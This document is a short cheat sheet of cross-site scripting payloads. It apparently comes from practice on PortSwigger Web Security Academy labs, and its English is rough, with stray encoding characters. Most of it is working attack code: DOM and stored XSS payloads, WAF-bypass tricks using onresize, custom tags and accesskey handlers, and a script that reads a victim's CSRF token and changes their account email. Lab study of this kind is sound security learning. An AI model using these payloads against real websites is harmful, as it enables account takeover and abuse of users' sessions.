Arithmetic operator with JSΒ β> Cause Reflected DOM XSS
\"-alert(1)}//
Stored DOM XSS bypass the encode bracket
<><img src=1 onerror=alert(1)>
Script for executing CSRF Form for XSS by using token CSRF
<script>var req = new XMLHttpRequest();req.onload = handleResponse;req.open('get','/my-account',true);req.send();function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/my-account/change-email', true); changeReq.send('csrf='+token+'&email=test@test.com')};</script>
Tip for causing XSS with block by WAF (web applications firewall)
Brute force to find the tag can available
Try to execute attribute with tag available
And force the website do the eventΒ β> Execute the XSS
Example:Β <iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
If on situation the server block all of tag can inject into the codeΒ β> we need to create them own likeΒ <xss>
Payload can help you filter xss via press event by key button to causing the reflect
%27accesskey=%27x%27onclick=%27alert(1)
If some case study like they add black splashΒ /Β after you input that with quote so with causing reflect xss using close tag for </script>Β for ignore that situation and after that causing payload